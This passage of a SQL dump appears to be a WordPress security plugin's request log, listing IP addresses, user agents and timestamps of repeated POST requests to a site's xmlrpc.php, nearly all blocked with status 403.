Safari\\/537.36\"}','9jMzBRyxpUWXrFl7h1IOZdsv',0,1681526784.8118,4154,'','POST',403,0,515,0,1,'',0),('176.56.56.133',2956474501,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','AogjnX7CeKyslGkRSWYONmUJ',0,1681526792.6216,627,'','POST',403,0,515,0,1,'',0),('101.50.2.67',1697776195,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','wx4rWDXaN9hpYM65TjdlemI3',0,1681526793.6610,572,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','eRaYAZ01L7l5wfvuzmqV6P3s',0,1681526801.8382,649,'','POST',403,0,515,0,1,'',0),('138.186.9.114',2327447922,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','AwQSpRgDEY7eTdPNZ6atn3q0',0,1681526814.4174,578,'','POST',403,0,515,0,1,'',0),('50.62.137.47',842959151,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','vlRaoU7ZrxtpFPw1XeA9kzCK',0,1681526821.2994,615,'','POST',403,0,515,0,1,'',0),('141.98.18.59',2372014651,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','uXMo9egUvlE4Y85mLnNbjJcW',0,1681526822.1081,602,'','POST',403,0,515,0,1,'',0),('184.75.221.43',3091979563,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','AMGb2U1Ou7KdQqIp4ftg5Sr9',0,1681528153.4238,895,'','POST',403,0,515,0,1,'',0),('185.156.175.51',3114053427,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uJzZjtl9bVgWeQ0cwyTKHmGN',0,1681530369.1195,4392,'','POST',403,0,515,0,1,'',0),('104.254.90.235',1761499883,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','AcP8h5pH6ROBSMvbCo4wiZ1a',0,1681530843.2061,3650,'','POST',403,0,515,0,1,'',0),('185.253.215.16',3120420624,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','LhPs6SwJIM2BQRxFlvcTg07i',0,1681533494.2664,4874,'','POST',403,0,515,0,1,'',0),('103.42.56.253',1730820349,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','4ItRHPN5BZvDGeCTckqhjpX6',0,1681533503.4556,594,'','POST',403,0,515,0,1,'',0),('199.85.208.215',3344290007,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','YPSd3KUHof4r5QBkezCT82OI',0,1681533508.3413,603,'','POST',403,0,515,0,1,'',0),('89.201.167.100',1506387812,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','dVvjq6uKUF3ISEsOk1BtTa2P',0,1681533509.0960,559,'','POST',403,0,515,0,1,'',0),('103.159.84.218',1738495194,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','LqoY4dGDfkM9TgWSHsB57UQN',0,1681533513.8108,552,'','POST',403,0,515,0,1,'',0),('190.92.247.74',3193763658,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','bVxGYralyD2CJ0n81wRAMdZe',0,1681533517.3744,566,'','POST',403,0,515,0,1,'',0),('125.227.111.133',2112057221,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','0KJFSzL1vmtgUVd6CwuPcHsx',0,1681533522.7788,550,'','POST',403,0,515,0,1,'',0),('199.85.208.215',3344290007,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','dz9PW75RX4rsbSOIFZkpnoDY',0,1681533531.0896,579,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','0rl1q2793biWYeLmcBXEpC8s',0,1681533531.8566,611,'','POST',403,0,515,0,1,'',0),('162.0.232.58',2717968442,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','ZB1CfD0P5jgqxURKze698nYu',0,1681533534.8905,561,'','POST',403,0,515,0,1,'',0),('103.117.180.72',1735767112,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','fXoCRr4FnH2lu7EDjySULc61',0,1681534839.7191,4935,'','POST',403,0,515,0,1,'',0),('35.214.190.212',601276116,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','VJ8ogOY2htqWme1kBuyHNPrp',0,1681534843.5492,3106,'','POST',403,0,515,0,1,'',0),('144.126.132.168',2424210600,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','w91ZLAeIjr3xd64bnSXyq7lV',0,1681534844.0431,3055,'','POST',403,0,515,0,1,'',0),('107.190.132.194',1807647938,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','xjdu82047fnoC1e6IKVktWDR',0,1681534860.6642,981,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','ijphUbfray5IxAY2g43BeJlG',0,1681534861.2735,864,'','POST',403,0,515,0,1,'',0),('202.61.232.109',3393054829,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','bzMYf4AJkTPUO3NSglHupI29',0,1681534866.9515,1325,'','POST',403,0,515,0,1,'',0),('144.126.132.168',2424210600,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','CkNev6OrDFRx82zGpHT0qcsU',0,1681534867.0552,1240,'','POST',403,0,515,0,1,'',0),('103.221.223.238',1742594030,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','VbWALOCqRS0nzNByjUFKuXHG',0,1681535577.1484,1409,'','POST',403,0,515,0,1,'',0),('207.180.207.149',3484733333,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','cnKATIMamENwvGihoqJzkXCD',0,1681535575.3658,3885,'','POST',403,0,515,0,1,'',0),('91.231.140.73',1541901385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','6VMANRqnvHQmXy4O7sKbjcxl',0,1681535589.5836,565,'','POST',403,0,515,0,1,'',0),('202.61.232.109',3393054829,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','6JpTn2diIkGWA0H8xXyR1FqP',0,1681535590.3252,593,'','POST',403,0,515,0,1,'',0),('162.0.229.115',2717967731,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','mHKxFqzN9OBVQd1s6EAleMpX',0,1681535593.0600,567,'','POST',403,0,515,0,1,'',0),('184.75.221.171',3091979691,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','215woV4mqjHJPKgZGnvX30Eb',0,1681536214.2795,4380,'','POST',403,0,515,0,1,'',0),('149.248.50.72',2516070984,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JoLrw1EKORTcAsQC9dmFgfeZ',0,1681537021.4551,1910,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','ZquMNHoShK2zIa48U7jerCPW',0,1681537018.8203,5174,'','POST',403,0,515,0,1,'',0),('27.100.11.206',459541454,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','cIR7xa5GUiCKJs3npNmhwWrz',0,1681537026.0057,637,'','POST',403,0,515,0,1,'',0),('66.42.49.228',1110061540,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','5UA8rHMiIthXS9bVDTa6QKFB',0,1681537030.5525,607,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','6uXi4qB1ESjxdyPaC7eAt9KT',0,1681537036.0648,761,'','POST',403,0,515,0,1,'',0),('160.153.155.29',2694421277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','sJxMVqmilXFtO2U1Q3cInh09',0,1681537038.8972,1360,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','taPpJdBD7GHIxKvqe8wr52Ri',0,1681537039.4426,1129,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','5vERZaC3OLdQlxHGKrf4VTs7',0,1681537049.5489,580,'','POST',403,0,515,0,1,'',0),('5.135.143.169',92770217,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','W3E1lhZ9YNAMzTVdFqpbHXc6',0,1681537053.2188,615,'','POST',403,0,515,0,1,'',0),('82.223.115.237',1390375917,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','I6gdHyRqotV0pPK2W5AlfinE',0,1681537059.1460,1350,'','POST',403,0,515,0,1,'',0),('183.181.91.159',3082115999,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','hFRcATGyE6DfX7b4IQsqYPZr',0,1681537064.9735,1011,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','QjbwV4eolPUEIGcfu06ATrmp',0,1681537065.3745,1082,'','POST',403,0,515,0,1,'',0),('184.75.223.235',3091980267,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vQs2wr63Xl7JF19ad0gCZeok',0,1681538531.7381,3614,'','POST',403,0,515,0,1,'',0),('104.254.90.187',1761499835,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','0Lkbdei8gxuNAOt4wp5FXsHY',0,1681538552.7361,1973,'','POST',403,0,515,0,1,'',0),('183.181.91.159',3082115999,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','AOILSlCnErJZjRkP2g46qQ0b',0,1681541411.4657,5892,'','POST',403,0,515,0,1,'',0),('178.32.187.122',2988489594,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','aW9xs2dyT4Dwv7bK5lkMhQZA',0,1681541419.9714,598,'','POST',403,0,515,0,1,'',0),('195.154.107.17',3281677073,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','1ly8NhD3zk5LG0Jfp4TXYFVa',0,1681541427.3163,612,'','POST',403,0,515,0,1,'',0),('195.158.22.187',3281917627,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','l28FdYx10c9BHWEhrMSmanL4',0,1681541447.2183,2722,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','dhfkCM5FPv9igT26yDornNe0',0,1681541449.6481,852,'','POST',403,0,515,0,1,'',0),('213.152.161.211',3583549907,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','pX4tMIuq2zd9LiV7JH1TslSx',0,1681541645.7665,2748,'','POST',403,0,515,0,1,'',0),('173.231.207.89',2917650265,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','XVmaT3FInBEiPvsuJCOqjNtf',0,1681544011.7178,2259,'','POST',403,0,515,0,1,'',0),('68.178.228.199',1152574663,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','swnXarU6KoJ5qzHtmjpL8gev',0,1681544009.9175,4225,'','POST',403,0,515,0,1,'',0),('144.76.74.227',2420919011,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','mwbr7yOou9TvKZLhAptRBzaU',0,1681544012.6681,1970,'','POST',403,0,515,0,1,'',0),('77.220.104.89',1306290265,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','j8fZGi9yewru6M2bSVQ3Lzs5',0,1681544018.8771,624,'','POST',403,0,515,0,1,'',0),('68.178.228.199',1152574663,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','LlJk43A8VCSRrUe5IHnwKdsg',0,1681544024.1838,626,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','BpaeX8KDoh0O9CkY5LmVZ3zj',0,1681544039.2822,715,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','fg1yqFPMEYZ8UtXQmhao3xj9',0,1681544042.8457,634,'','POST',403,0,515,0,1,'',0),('68.178.228.199',1152574663,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','9jQPbcalsqJC1iowZLK0AvDY',0,1681544047.5108,421,'','POST',404,0,515,0,1,'',0),('103.221.223.238',1742594030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','WnmX0Me2HuldPYD3giFzbI4h',0,1681544050.0641,624,'','POST',403,0,515,0,1,'',0),('51.195.124.72',868449352,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','sH5fahAt9jFdXcb62OnpDe4i',0,1681544052.9893,633,'','POST',403,0,515,0,1,'',0),('178.32.201.69',2988493125,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','NAB3isfYXmwQ0xqVFacDoCpt',0,1681544066.1669,583,'','POST',403,0,515,0,1,'',0),('66.42.49.228',1110061540,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','hJ6sgm5X3Dtyk1VQYfjSP7o8',0,1681544212.7403,3542,'','POST',403,0,515,0,1,'',0),('66.29.141.9',1109232905,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','qfS3oNpWTn4gxsLhKurwD9JR',0,1681544219.6341,656,'','POST',403,0,515,0,1,'',0),('82.196.8.42',1388578858,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','ICjyLiXv0qfm4TsBrK76ZzSe',0,1681544226.4355,588,'','POST',403,0,515,0,1,'',0),('70.38.21.232',1176901096,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','Rriu3nS4MsTFLxjtcmhNyowq',0,1681544228.8976,566,'','POST',403,0,515,0,1,'',0),('81.88.52.16',1364734992,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','lczio81ZjIUAQPR9xuYdHSfb',0,1681544233.1648,599,'','POST',403,0,515,0,1,'',0),('194.195.112.30',3267588126,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','rjZslMHLX30KcEF14aRWoPTh',0,1681544236.5112,561,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','ehRAZOrjKoaGsV1LcFxfUWbC',0,1681544242.1514,575,'','POST',403,0,515,0,1,'',0),('185.2.5.90',3103917402,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','mQYfwWTeb5HcdahtFLxul4GK',0,1681544243.8474,634,'','POST',403,0,515,0,1,'',0),('104.236.7.86',1760298838,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','Mc2g6Tb5hjaJfVOndHEU1wze',0,1681544249.9672,584,'','POST',403,0,515,0,1,'',0),('46.38.249.174',774306222,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','QsObE4rtae3j5GKwMWCzfIiy',0,1681544256.5621,579,'','POST',403,0,515,0,1,'',0),('104.207.254.152',1758461592,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','5vhN4o0Uj2Ikzsy3J71OYMtP',0,1681544264.5282,585,'','POST',403,0,515,0,1,'',0),('109.94.209.234',1834930666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','j9rCYFmgdsP2T3tqSv4DpiNJ',0,1681545796.7493,3496,'','POST',403,0,515,0,1,'',0),('92.205.53.115',1556952435,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','4KEeWSsvkCdl0OxZhFucLmDf',0,1681545797.3349,2911,'','POST',403,0,515,0,1,'',0),('50.62.137.47',842959151,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','197ToYzHZW86VGsqNRXFclme',0,1681545806.7591,1409,'','POST',403,0,515,0,1,'',0),('103.211.219.49',1741937457,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','7gjKRc5JyUIbC4LFmkwHWdGt',0,1681545806.8825,1371,'','POST',403,0,515,0,1,'',0),('3.208.186.199',64010951,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','ihTDUHrplNdSIX3xKV7QWEY5',0,1681545810.5167,607,'','POST',403,0,515,0,1,'',0),('122.10.113.53',2047504693,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','KCy3JsOx27gw5fTdH9cDMWGI',0,1681545814.4063,588,'','POST',403,0,515,0,1,'',0),('159.89.203.225',2673462241,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','nh7U3Crdv0F2Vp9RBOg6ewXE',0,1681545825.3054,600,'','POST',403,0,515,0,1,'',0),('101.50.2.67',1697776195,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 